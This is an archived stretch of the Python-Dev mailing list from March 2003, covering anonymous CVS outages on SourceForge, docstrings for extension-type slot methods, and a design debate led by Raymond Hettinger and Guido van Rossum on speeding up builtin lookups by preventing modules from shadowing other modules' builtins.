Date: Tue, 25 Mar 2003 13:58:50 -0600
Subject: [Python-Dev] cvs.python.sourceforge.net fouled up
In-Reply-To: <20030325194200.52171.qmail@web10305.mail.yahoo.com>
References: <20030325194200.52171.qmail@web10305.mail.yahoo.com>
Message-ID: <16000.46330.437431.388294@montanaro.dyndns.org>

    Graham> $ cvs update
    Graham> cvs [update aborted]: recv() from server cvs.python.sourceforge.net: EOF

    Graham> I've been having this problem on and off for weeks now with
    Graham> anonymous Python cvs.

I've noticed various problems as well, from extraordinarily slow response
times to failures such as the above.  At the moment it seems to be working
reasonably well.  I'm using authenticate access, not anonymous, though I
don't think that should make a difference.

Skip


From graham_guttocks@yahoo.co.nz  Tue Mar 25 20:22:38 2003
From: graham_guttocks@yahoo.co.nz (=?iso-8859-1?q?Graham=20Guttocks?=)
Date: Wed, 26 Mar 2003 08:22:38 +1200 (NZST)
Subject: [Python-Dev] cvs.python.sourceforge.net fouled up
In-Reply-To: <16000.46330.437431.388294@montanaro.dyndns.org>
Message-ID: <20030325202238.72747.qmail@web10304.mail.yahoo.com>

Skip Montanaro <skip@pobox.com> wrote: 
>
> I'm using authenticate access, not anonymous, though I
> don't think that should make a difference.

Actually, it does make a difference.  I've only had the
problem I posted when using anonymous pserver cvs.  When
using authenticated (ssh) cvs access to sourceforge, my
results are MUCH better.

=====
Regards,
Graham

http://mobile.yahoo.com.au - Yahoo! Mobile
- Check & compose your email via SMS on your Telstra or Vodafone mobile.


From martin@v.loewis.de  Tue Mar 25 20:29:04 2003
From: martin@v.loewis.de (Martin v. =?iso-8859-15?q?L=F6wis?=)
Date: 25 Mar 2003 21:29:04 +0100
Subject: [Python-Dev] cvs.python.sourceforge.net fouled up
In-Reply-To: <20030325202238.72747.qmail@web10304.mail.yahoo.com>
References: <20030325202238.72747.qmail@web10304.mail.yahoo.com>
Message-ID: <m31y0vchrj.fsf@mira.informatik.hu-berlin.de>

Graham Guttocks <graham_guttocks@yahoo.co.nz> writes:

> Actually, it does make a difference.  I've only had the
> problem I posted when using anonymous pserver cvs.  When
> using authenticated (ssh) cvs access to sourceforge, my
> results are MUCH better.

This is documented (see site status): in overload situations,
anonymous access is disabled in favour of authenticated access
(to let people who actually work on all this continue to work).

Regards,
Martin


From graham_guttocks@yahoo.co.nz  Tue Mar 25 21:23:17 2003
From: graham_guttocks@yahoo.co.nz (=?iso-8859-1?q?Graham=20Guttocks?=)
Date: Wed, 26 Mar 2003 09:23:17 +1200 (NZST)
Subject: [Python-Dev] cvs.python.sourceforge.net fouled up
In-Reply-To: <m31y0vchrj.fsf@mira.informatik.hu-berlin.de>
Message-ID: <20030325212317.10077.qmail@web10308.mail.yahoo.com>

"Martin v. L�wis" <martin@v.loewis.de> wrote: 
>
> This is documented (see site status): in overload situations,
> anonymous access is disabled in favour of authenticated access

Unfortunately, it seems the "overload" situation is now 
becoming the standard.  I can't remember the last time I
was able to anonymous cvs update on the first try.

=====
Regards,
Graham

http://mobile.yahoo.com.au - Yahoo! Mobile
- Check & compose your email via SMS on your Telstra or Vodafone mobile.


From greg@cosc.canterbury.ac.nz  Tue Mar 25 22:49:27 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Wed, 26 Mar 2003 10:49:27 +1200 (NZST)
Subject: [Python-Dev] Doc strings for typeslots?
In-Reply-To: <m31y0vchrj.fsf@mira.informatik.hu-berlin.de>
Message-ID: <200303252249.h2PMnR310503@oma.cosc.canterbury.ac.nz>

A Pyrex user recently pointed out to me that trying
to give a docstring to an __xxx__ method of an
extension type doesn't work.

The reason for this is that the C functions implementing
these methods live in slots of the typeobject, and there's
apparently nowhere to put docstrings for them.

I'm speculating that this could be worked around by
getting the slot's wrapper object out of the type
dict after the type is initialised, and stuffing a
docstring into it.

This would only work if a new set of wrappers is created
for each type, rather than re-using generic ones. An
experiment suggests that this is what happens -- can
anyone confirm this?

Or, is there a better way of giving these things
docstrings that I've missed?

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From guido@python.org  Tue Mar 25 23:02:14 2003
From: guido@python.org (Guido van Rossum)
Date: Tue, 25 Mar 2003 18:02:14 -0500
Subject: [Python-Dev] Doc strings for typeslots?
In-Reply-To: "Your message of Wed, 26 Mar 2003 10:49:27 +1200."
 <200303252249.h2PMnR310503@oma.cosc.canterbury.ac.nz>
References: <200303252249.h2PMnR310503@oma.cosc.canterbury.ac.nz>
Message-ID: <200303252302.h2PN2ER11372@pcp02138704pcs.reston01.va.comcast.net>

> A Pyrex user recently pointed out to me that trying
> to give a docstring to an __xxx__ method of an
> extension type doesn't work.
> 
> The reason for this is that the C functions implementing
> these methods live in slots of the typeobject, and there's
> apparently nowhere to put docstrings for them.
> 
> I'm speculating that this could be worked around by
> getting the slot's wrapper object out of the type
> dict after the type is initialised, and stuffing a
> docstring into it.
> 
> This would only work if a new set of wrappers is created
> for each type, rather than re-using generic ones. An
> experiment suggests that this is what happens -- can
> anyone confirm this?
> 
> Or, is there a better way of giving these things
> docstrings that I've missed?

Um, I'm afraid this is how it is.  __xxx__ methods have generic
docstrings. :-(

--Guido van Rossum (home page: http://www.python.org/~guido/)


From greg@cosc.canterbury.ac.nz  Wed Mar 26 00:01:00 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Wed, 26 Mar 2003 12:01:00 +1200 (NZST)
Subject: [Python-Dev] Doc strings for typeslots?
In-Reply-To: <200303252302.h2PN2ER11372@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <200303260001.h2Q010211097@oma.cosc.canterbury.ac.nz>

> Um, I'm afraid this is how it is.  __xxx__ methods have generic
> docstrings. :-(

Can you just clarify a bit what you mean by "this":
would my idea of poking a docstring into the wrapper
object work, or do all types share the same wrappers?

It seems as though they *don't* share the same wrappers...

Python 2.2 (#1, Jul 11 2002, 14:19:37) 
>>> id(int.__dict__['__add__'])
135662196
>>> id(float.__dict__['__add__'])
135668268

...or is there some magic going on there that I'm
not aware of?

Thanks,

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From guido@python.org  Wed Mar 26 02:32:55 2003
From: guido@python.org (Guido van Rossum)
Date: Tue, 25 Mar 2003 21:32:55 -0500
Subject: [Python-Dev] Doc strings for typeslots?
In-Reply-To: "Your message of Wed, 26 Mar 2003 12:01:00 +1200."
 <200303260001.h2Q010211097@oma.cosc.canterbury.ac.nz>
References: <200303260001.h2Q010211097@oma.cosc.canterbury.ac.nz>
Message-ID: <200303260232.h2Q2Wts11814@pcp02138704pcs.reston01.va.comcast.net>

> > Um, I'm afraid this is how it is.  __xxx__ methods have generic
> > docstrings. :-(
> 
> Can you just clarify a bit what you mean by "this":
> would my idea of poking a docstring into the wrapper
> object work, or do all types share the same wrappers?
> 
> It seems as though they *don't* share the same wrappers...
> 
> Python 2.2 (#1, Jul 11 2002, 14:19:37) 
> >>> id(int.__dict__['__add__'])
> 135662196
> >>> id(float.__dict__['__add__'])
> 135668268
> 
> ...or is there some magic going on there that I'm
> not aware of?

The descriptors are indeed separate objects, because they wrap
different C implemetations (int vs. float add).  But they contain a
pointer to a static piece of data which is shared by all wrappers, and
that's where they get their docstring.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From Raymond Hettinger" <python@rcn.com  Thu Mar 27 21:37:59 2003
From: Raymond Hettinger" <python@rcn.com (Raymond Hettinger)
Date: Thu, 27 Mar 2003 16:37:59 -0500
Subject: [Python-Dev] Fast access to __builtins__
Message-ID: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer>

>From past rumblings, I gather that Python is moving
towards preventing __builtins__ from being shadowed.

I would like to know what you guys think about going ahead 
with that idea whenever the -O optimization flag is set.

The idea is to scan the code for lines like:

    LOAD_GLOBAL  2 (range)


and, if the name is found in __builtins__, then lookup
the name, add the reference to the constants table and, 
replace the code with something like:

   LOAD_CONST   5 (<type 'range'>)


The opcode replacement bypasses module level shadowing 
but leaves local shadowing intact.  For example:

modglob = 1            
range = xrange 
def f(list):
     for i in list:         # local shadowing of 'list' is unaffected
          print ord(i)    # access to 'ord' is optimized
          j = modglob  # non-shadowed globals are unaffected
          k = range(j)   # shadowing of globals is ignored


I've already tried out a pure python proof-of-concept and it is 
straightforward to recode it in C and attach it to PyCode_New().  


Raymond Hettinger


From jack@performancedrivers.com  Thu Mar 27 22:15:05 2003
From: jack@performancedrivers.com (Jack Diederich)
Date: Thu, 27 Mar 2003 17:15:05 -0500
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer>; from raymond.hettinger@verizon.net on Thu, Mar 27, 2003 at 04:37:59PM -0500
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer>
Message-ID: <20030327171505.A1450@localhost.localdomain>

On Thu, Mar 27, 2003 at 04:37:59PM -0500, Raymond Hettinger wrote:
> >From past rumblings, I gather that Python is moving
> towards preventing __builtins__ from being shadowed.
> 
> I would like to know what you guys think about going ahead 
> with that idea whenever the -O optimization flag is set.
> 

The behavior of a program under -O should be as similar as possible to normal
operation.  This would break that for some programs.
A per-file pragma directive would work.  The downside of a pragma module or
keyword would be what people try to add to it later.

-jackdied


From skip@pobox.com  Thu Mar 27 22:17:53 2003
From: skip@pobox.com (Skip Montanaro)
Date: Thu, 27 Mar 2003 16:17:53 -0600
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer>
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer>
Message-ID: <16003.30865.470726.301805@montanaro.dyndns.org>

    Raymond> From past rumblings, I gather that Python is moving towards
    Raymond> preventing __builtins__ from being shadowed.

    Raymond> I would like to know what you guys think about going ahead with
    Raymond> that idea whenever the -O optimization flag is set.

Interesting idea, but I think of shadowing builtins being somewhat
orthogonal to optimization in the usual sense (speed things up without
changing the program's semantics).  This is clearly a semantic change, so
I'd like to see a different command line flag control this behavior.

What happens if you run one program with builtin shadowing enabled, it
writes some .pyo files with your suggested change, then later you run
another program without it?  Seems like there should be some memory in the
file of how it was generated so the importer can raise an exception if it
finds a mismatch between the shadowing command line flag and a previously
generated bytecode file.

Skip


From mal@lemburg.com  Thu Mar 27 22:24:50 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Thu, 27 Mar 2003 23:24:50 +0100
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer>
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer>
Message-ID: <3E837A32.6010400@lemburg.com>

Raymond Hettinger wrote:
>>From past rumblings, I gather that Python is moving
> towards preventing __builtins__ from being shadowed.
> 
> I would like to know what you guys think about going ahead 
> with that idea whenever the -O optimization flag is set.
> 
> The idea is to scan the code for lines like:
> 
>     LOAD_GLOBAL  2 (range)
> 
> 
> and, if the name is found in __builtins__, then lookup
> the name, add the reference to the constants table and, 
> replace the code with something like:
> 
>    LOAD_CONST   5 (<type 'range'>)

Using the -O for this is not a working possibility. -OO
is reserved for optimizations which can change semantics,
but even there, I'd rather like a per-module switch than
a command line switch.

BTW, why not have a new opcode for symbols in the
builtins and then only tweak the opcode implementation
instead of having the compiler generate different code ?

> The opcode replacement bypasses module level shadowing 
> but leaves local shadowing intact.  For example:
> 
> modglob = 1            
> range = xrange 
> def f(list):
>      for i in list:         # local shadowing of 'list' is unaffected
>           print ord(i)    # access to 'ord' is optimized
>           j = modglob  # non-shadowed globals are unaffected
>           k = range(j)   # shadowing of globals is ignored
> 
> 
> I've already tried out a pure python proof-of-concept and it is 
> straightforward to recode it in C and attach it to PyCode_New().  
> 
> 
> Raymond Hettinger
> 
> _______________________________________________
> Python-Dev mailing list
> Python-Dev@python.org
> http://mail.python.org/mailman/listinfo/python-dev

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Software directly from the Source  (#1, Mar 27 2003)
 >>> Python/Zope Products & Consulting ...         http://www.egenix.com/
 >>> mxODBC, mxDateTime, mxTextTools ...        http://python.egenix.com/
________________________________________________________________________
Python UK 2003, Oxford:                                      5 days left
EuroPython 2003, Charleroi, Belgium:                        89 days left


From python@rcn.com  Fri Mar 28 00:35:20 2003
From: python@rcn.com (Raymond Hettinger)
Date: Thu, 27 Mar 2003 19:35:20 -0500
Subject: [Python-Dev] Fast access to __builtins__
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer> <3E837A32.6010400@lemburg.com>
Message-ID: <003601c2f4c1$ea28c0c0$df10a044@oemcomputer>

[Jack Diederich]
> The behavior of a program under -O should be as similar as possible to normal
> operation.  This would break that for some programs.
> A per-file pragma directive would work.

[Skip Montanero]
> This is clearly a semantic change, so
> I'd like to see a different command line flag control this behavior

[M.-A. Lemburg]
> Using the -O for this is not a working possibility. -OO
> is reserved for optimizations which can change semantics,
> but even there, I'd rather like a per-module switch than
> a command line switch.

That makes good sense.  
Are you guys thinking of something like this:

__fastbuiltins__ = True  # optimize all subsequent defs in the module


[Jack Diederich]
> The downside of a pragma module or
> keyword would be what people try to add to it later.

Ideally, enabling the pragma would also trigger warnings when the
module shadows a builtin.


[M.-A. Lemburg]
> BTW, why not have a new opcode for symbols in the
> builtins and then only tweak the opcode implementation
> instead of having the compiler generate different code ?

Either way results in changing one opcode/oparg pair, so I
don't see how having a new opcode helps.  At some point,
the name has to be looked-up and a reference to it stored.
Afterwards, LOAD_CONST is all that is needed to fetch
the reference.


Raymond Hettinger


From nas@python.ca  Fri Mar 28 02:26:49 2003
From: nas@python.ca (Neil Schemenauer)
Date: Thu, 27 Mar 2003 18:26:49 -0800
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: <3E837A32.6010400@lemburg.com>
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer> <3E837A32.6010400@lemburg.com>
Message-ID: <20030328022649.GA30139@glacier.arctrix.com>

M.-A. Lemburg wrote:
> Using the -O for this is not a working possibility. -OO
> is reserved for optimizations which can change semantics,
> but even there, I'd rather like a per-module switch than
> a command line switch.

Optimization options that globally change semantics seem like a bad
idea.  How would you know some module you are using will not break?  I
agree with Mark that a per-module switch would be better.

In this case, I'm not sure either option is necessary.  If I understand
Guido correctly, eventually programs may not be allowed to stick names
into other modules that override builtins used by that module.  If that
is disallowed then the compiler knows if a name is a builtin or a
global.

We could introduce a warning for code that breaks the new rules and have
a __future__ statement that implements the optimization.

  Neil


From greg@cosc.canterbury.ac.nz  Fri Mar 28 02:48:37 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Fri, 28 Mar 2003 14:48:37 +1200 (NZST)
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: <20030328022649.GA30139@glacier.arctrix.com>
Message-ID: <200303280248.h2S2mb621846@oma.cosc.canterbury.ac.nz>

Neil Schemenauer <nas@python.ca>:

> Optimization options that globally change semantics seem like a bad
> idea.  How would you know some module you are using will not break?  I
> agree with Mark that a per-module switch would be better.

There's something a bit strange about this situation,
though.

The compiler knows whether a module shadows any of its
*own* builtins, and can avoid applying the optimisation
to those names. So the optimisation doesn't change the
semantics of the module itself, provided some conditions
are met.

But those conditions depend on things *outside* the
module -- namely, whether any *other* module assigns
to one of this module's globals so as to shadow a
builtin.

This makes me think that having a flag inside the
module is not the right thing to do, or at least it's
not the only thing that's needed. There needs to be
a way to turn the optimisation *off* from outside the 
affected module.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From jack@performancedrivers.com  Fri Mar 28 03:21:10 2003
From: jack@performancedrivers.com (Jack Diederich)
Date: Thu, 27 Mar 2003 22:21:10 -0500
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: <003601c2f4c1$ea28c0c0$df10a044@oemcomputer>; from python@rcn.com on Thu, Mar 27, 2003 at 07:35:20PM -0500
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer> <3E837A32.6010400@lemburg.com> <003601c2f4c1$ea28c0c0$df10a044@oemcomputer>
Message-ID: <20030327222109.B1450@localhost.localdomain>

On Thu, Mar 27, 2003 at 07:35:20PM -0500, Raymond Hettinger wrote:
[Raymond proposed this pythonic version of a pragma]
> __fastbuiltins__ = True  # optimize all subsequent defs in the module
>
> [Jack Diederich]
> > The downside of a pragma module or
> > keyword would be what people try to add to it later.
> 
> Ideally, enabling the pragma would also trigger warnings when the
> module shadows a builtin.

I was thinking that a first-class keyword like
pragma no_shadow_builtins
would give people a hook to suggest all kinds of nastiness in the future.
In your pythonness your suggestion avoided this entirely.

We are talking about a very per-module thing, and author's intent.
As a progression, how about a subclass of dictionaries that implement
warn-on-assign and error-on-assign properties.  Having a subclass of dicts
specifically for symbol tables has been suggested before and has a wide
variety of benefits[1].  This is a good example.

-jackdied

[1] benefits of a specific 'symtab' type that derives from dict
 (all variations on 'one stop shop for optimizations')
 * string-only
 * assign-once (builtins)
 * cached lookups


From guido@python.org  Fri Mar 28 03:23:22 2003
From: guido@python.org (Guido van Rossum)
Date: Thu, 27 Mar 2003 22:23:22 -0500
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: "Your message of Thu, 27 Mar 2003 16:37:59 EST."
 <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer>
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer>
Message-ID: <200303280323.h2S3NMQ18471@pcp02138704pcs.reston01.va.comcast.net>

Hi Raymond.  Too bad you couldn't make it to the conference!  We're
all having a great time on and off the GWU premises.  I used your
"more zen" on a slide in my keynote.

> From past rumblings, I gather that Python is moving
> towards preventing __builtins__ from being shadowed.

You must be misunderstanding.

The only thing I want to forbid is to stick a name in *another*
module's globals that would shadow a builtin.  E.g. suppose module A
contains:

  def f(a):
      return len(a)

and module B contains:

  import A
  A.len = lambda a: len(a) or 1 # evil len()

The assignment to A.len would be forbidden.

OTOH this:

  import random
  if random.random() >= 0.5:
    len = 42
  def f():
     return len

will always be allowed and mean what it currently means.

The difference is that in the first module, analysis of module A does
not reveal that len is shadowed; OTOH in the second example, analyzing
just the module's code shows that len may be a global built-in.  This
is important because a programmer shouldn't have to know the names of
built-in objects she doesn't use (also important because in a future
version of the language, a name you've picked for a global may become
a builtin).

The idea of forbidding module B in the first example is that the
optimizer is allowed to replace len(a) with a bytecode that calls
PyOject_Size() rather than looking up "len" in globals and builtins.
The optimizer should only be allowed to make this assumption if
careful analysis of an entire module doesn't reveal any possibility
that "len" can be shadowed.  But it cannot be required to look at all
other modules (since those other modules may not even have been
written!).

Hope this helps.

BTW this idea is quite old; I've described it a few years ago under a
subject something like "low-hanging fruit".

--Guido van Rossum (home page: http://www.python.org/~guido/)


From nas@python.ca  Fri Mar 28 03:50:31 2003
From: nas@python.ca (Neil Schemenauer)
Date: Thu, 27 Mar 2003 19:50:31 -0800
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: <200303280323.h2S3NMQ18471@pcp02138704pcs.reston01.va.comcast.net>
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer> <200303280323.h2S3NMQ18471@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <20030328035031.GB30245@glacier.arctrix.com>

Guido van Rossum wrote:
> BTW this idea is quite old; I've described it a few years ago under a
> subject something like "low-hanging fruit".

I really like this idea.  If a patch appeared on SF soon, do you think
2.3 could include a warning for code that violates the rule?

If so, how about also including a flag to allowed optimizations based on
the rule?  For example, I think we could have the equivalent of
LOAD_FAST for builtin names.  Implementing the optimizations could be a
bit of work, especially with the existing compiler, but I think the
warning should be fairly easy.

  Neil


From guido@python.org  Fri Mar 28 04:15:41 2003
From: guido@python.org (Guido van Rossum)
Date: Thu, 27 Mar 2003 23:15:41 -0500
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: "Your message of Thu, 27 Mar 2003 19:50:31 PST."
 <20030328035031.GB30245@glacier.arctrix.com>
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer>
 <200303280323.h2S3NMQ18471@pcp02138704pcs.reston01.va.comcast.net>
 <20030328035031.GB30245@glacier.arctrix.com>
Message-ID: <200303280415.h2S4Ff019207@pcp02138704pcs.reston01.va.comcast.net>

> Guido van Rossum wrote:
> > BTW this idea is quite old; I've described it a few years ago under a
> > subject something like "low-hanging fruit".
> 
> I really like this idea.  If a patch appeared on SF soon, do you think
> 2.3 could include a warning for code that violates the rule?

Maybe.  Though you probably would only want to warn when this is done
to a .py module -- C extensions should be exempt.  And the warning
should only warn about inserting names that are actually builtins.

> If so, how about also including a flag to allowed optimizations based on
> the rule?  For example, I think we could have the equivalent of
> LOAD_FAST for builtin names.  Implementing the optimizations could be a
> bit of work, especially with the existing compiler, but I think the
> warning should be fairly easy.

Sure, let's experiment!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From jeremy@alum.mit.edu  Fri Mar 28 04:45:31 2003
From: jeremy@alum.mit.edu (Jeremy Hylton)
Date: 27 Mar 2003 23:45:31 -0500
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: <200303280415.h2S4Ff019207@pcp02138704pcs.reston01.va.comcast.net>
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer>
 <200303280323.h2S3NMQ18471@pcp02138704pcs.reston01.va.comcast.net>
 <20030328035031.GB30245@glacier.arctrix.com>
 <200303280415.h2S4Ff019207@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <1048826730.23083.90.camel@localhost.localdomain>

On Thu, 2003-03-27 at 23:15, Guido van Rossum wrote:
> > I really like this idea.  If a patch appeared on SF soon, do you think
> > 2.3 could include a warning for code that violates the rule?
> 
> Maybe.  Though you probably would only want to warn when this is done
> to a .py module -- C extensions should be exempt.  And the warning
> should only warn about inserting names that are actually builtins.

It seems like C extensions pose thorny problems that need to be solved. 
In particular, the C API says that module's have a dictionary and that
adding a key creates global variable in the module.  We'll have to break
this one way or another, because we don't want to allow C extensions to
add globals that shadow builtins.  Right?

There's a similar problem for Python code, but I imagine it's easy to
come up with a dict proxy with the necessary restrictions along the
lines of a new-style class dict proxy.

How do we break the C API?  There's lots of extension code that relies
on getting the dict.  My first guess is to add an exception that says
setting a name that shadows a builtin has no effect.  Then extend the
getattr code and the module-dict-proxy to ignore those names.

Jeremy


From guido@python.org  Fri Mar 28 04:49:16 2003
From: guido@python.org (Guido van Rossum)
Date: Thu, 27 Mar 2003 23:49:16 -0500
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: "Your message of 27 Mar 2003 23:45:31 EST."
 <1048826730.23083.90.camel@localhost.localdomain>
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer>
 <200303280323.h2S3NMQ18471@pcp02138704pcs.reston01.va.comcast.net>
 <20030328035031.GB30245@glacier.arctrix.com>
 <200303280415.h2S4Ff019207@pcp02138704pcs.reston01.va.comcast.net>
 <1048826730.23083.90.camel@localhost.localdomain>
Message-ID: <200303280449.h2S4nGn19327@pcp02138704pcs.reston01.va.comcast.net>

> It seems like C extensions pose thorny problems that need to be solved. 
> In particular, the C API says that module's have a dictionary and that
> adding a key creates global variable in the module.  We'll have to break
> this one way or another, because we don't want to allow C extensions to
> add globals that shadow builtins.  Right?

I don't see the problem.  Typically, C extension modules don't have
Python code that runs in their globals, so messing with a C
extension's globals from the outside has no bad effect on Python code.

The problem is more that once a module is loaded, you can't tell from
the module whether it was loaded from a .py module or a C extension.

> There's a similar problem for Python code, but I imagine it's easy to
> come up with a dict proxy with the necessary restrictions along the
> lines of a new-style class dict proxy.

I'd be happy to proclaim that doing something like

  import X
  d = X.__dict__
  d["spam"] = 42    # or  exec "spam = 42" in d 

is always prohibited.

> How do we break the C API?  There's lots of extension code that relies
> on getting the dict.  My first guess is to add an exception that says
> setting a name that shadows a builtin has no effect.  Then extend the
> getattr code and the module-dict-proxy to ignore those names.

The C code can continue to access the real dict.  This is what happens
for new-style classes: in Python, C.__dict__ is a read-only proxy, but
in C, C->tp_dict is a real dict.  Then the setattr operation can do as
it pleases.  For new-style classes, it doesn't forbid anything but
updates the type struct when an operator was modified; for modules, it
could issue a warning when a name is set that didn't exist before and
that shadows a built-in.  (Ideally, it should only warn about
built-ins that are actually used by the module's code, but that
requires the parser to make the list of such built-ins available
somehow.)

Anyway, the C code that accesses the dict usually lives in the
extension module's init function.

Frankly, I'm a bit confused by your post.  Maybe I don't understand
what you're proposing?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From nas@python.ca  Fri Mar 28 05:51:13 2003
From: nas@python.ca (Neil Schemenauer)
Date: Thu, 27 Mar 2003 21:51:13 -0800
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: <200303280415.h2S4Ff019207@pcp02138704pcs.reston01.va.comcast.net>
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer> <200303280323.h2S3NMQ18471@pcp02138704pcs.reston01.va.comcast.net> <20030328035031.GB30245@glacier.arctrix.com> <200303280415.h2S4Ff019207@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <20030328055113.GA30405@glacier.arctrix.com>

Guido van Rossum wrote:
> Though you probably would only want to warn when this is done to a .py
> module -- C extensions should be exempt.

Exempt from poking or being poked?

> And the warning should only warn about inserting names that are
> actually builtins.

I have rough patch.  The idea is to have the tp_setattro slot of modules
check if the name being set is a builtin.  It seems to work but perhaps
there are cases that make that approach invalid.  Time for bed now. :-)

  Neil


From mal@lemburg.com  Fri Mar 28 08:34:54 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Fri, 28 Mar 2003 09:34:54 +0100
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: <003601c2f4c1$ea28c0c0$df10a044@oemcomputer>
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer>	<3E837A32.6010400@lemburg.com> <003601c2f4c1$ea28c0c0$df10a044@oemcomputer>
Message-ID: <3E84092E.1080803@lemburg.com>

Raymond Hettinger wrote:
 > [per module switch]
> That makes good sense.  
> Are you guys thinking of something like this:
> 
> __fastbuiltins__ = True  # optimize all subsequent defs in the module
> 
> [M.-A. Lemburg]
> 
>>BTW, why not have a new opcode for symbols in the
>>builtins and then only tweak the opcode implementation
>>instead of having the compiler generate different code ?
> 
> Either way results in changing one opcode/oparg pair, so I
> don't see how having a new opcode helps.  At some point,
> the name has to be looked-up and a reference to it stored.
> Afterwards, LOAD_CONST is all that is needed to fetch
> the reference.

Right, but with the new opcode you could have the interpreter
decide whether to optimize or not without recompiling the
code.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Software directly from the Source  (#1, Mar 28 2003)
 >>> Python/Zope Products & Consulting ...         http://www.egenix.com/
 >>> mxODBC, mxDateTime, mxTextTools ...        http://python.egenix.com/
________________________________________________________________________
Python UK 2003, Oxford:                                      4 days left
EuroPython 2003, Charleroi, Belgium:                        88 days left


From mal@lemburg.com  Fri Mar 28 08:38:28 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Fri, 28 Mar 2003 09:38:28 +0100
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: <200303280449.h2S4nGn19327@pcp02138704pcs.reston01.va.comcast.net>
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer> <200303280323.h2S3NMQ18471@pcp02138704pcs.reston01.va.comcast.net> <20030328035031.GB30245@glacier.arctrix.com> <200303280415.h2S4Ff019207@pcp02138704pcs.reston01.va.comcast.net> <1048826730.23083.90.camel@localhost.localdomain> <200303280449.h2S4nGn19327@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <3E840A04.6070700@lemburg.com>

Guido van Rossum wrote:
> I'd be happy to proclaim that doing something like
> 
>   import X
>   d = X.__dict__
>   d["spam"] = 42    # or  exec "spam = 42" in d 
> 
> is always prohibited.

That would break lazy module imports such as the one I'm using
in mx.Misc.LazyModule.py.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Software directly from the Source  (#1, Mar 28 2003)
 >>> Python/Zope Products & Consulting ...         http://www.egenix.com/
 >>> mxODBC, mxDateTime, mxTextTools ...        http://python.egenix.com/
________________________________________________________________________
Python UK 2003, Oxford:                                      4 days left
EuroPython 2003, Charleroi, Belgium:                        88 days left


From aleax@aleax.it  Fri Mar 28 09:31:30 2003
From: aleax@aleax.it (Alex Martelli)
Date: Fri, 28 Mar 2003 10:31:30 +0100
Subject: [Python-Dev] Fast access to __builtins__
In-Reply-To: <200303280449.h2S4nGn19327@pcp02138704pcs.reston01.va.comcast.net>
References: <000601c2f4ab$32aed9e0$9a0fa044@oemcomputer> <1048826730.23083.90.camel@localhost.localdomain> <200303280449.h2S4nGn19327@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <200303281031.30093.aleax@aleax.it>

On Friday 28 March 2003 05:49 am, Guido van Rossum wrote:
   ...
> I don't see the problem.  Typically, C extension modules don't have
> Python code that runs in their globals, so messing with a C
> extension's globals from the outside has no bad effect on Python code.

It happens, though -- for code whose performance is not important,
e.g. initialization and "resetting" kind of stuff, a PyRun_String can be
SO much more concise and handier than meticulous expansion of
basically the same things into tens of lines of C code... since
"messing from the outside" happens after initialization, and the use
cases I can easily find are all specifically DURING initialization, it may
be that this problem is too rare to worry about, but, I'm not so sure.


Alex


From oren-py-d@hishome.net  Fri Mar 28 09:44:42 2003
From: oren-py-d@hishome.net (Oren Tirosh)
Date: Fri, 28 Mar 2003 04:44:42 -0500
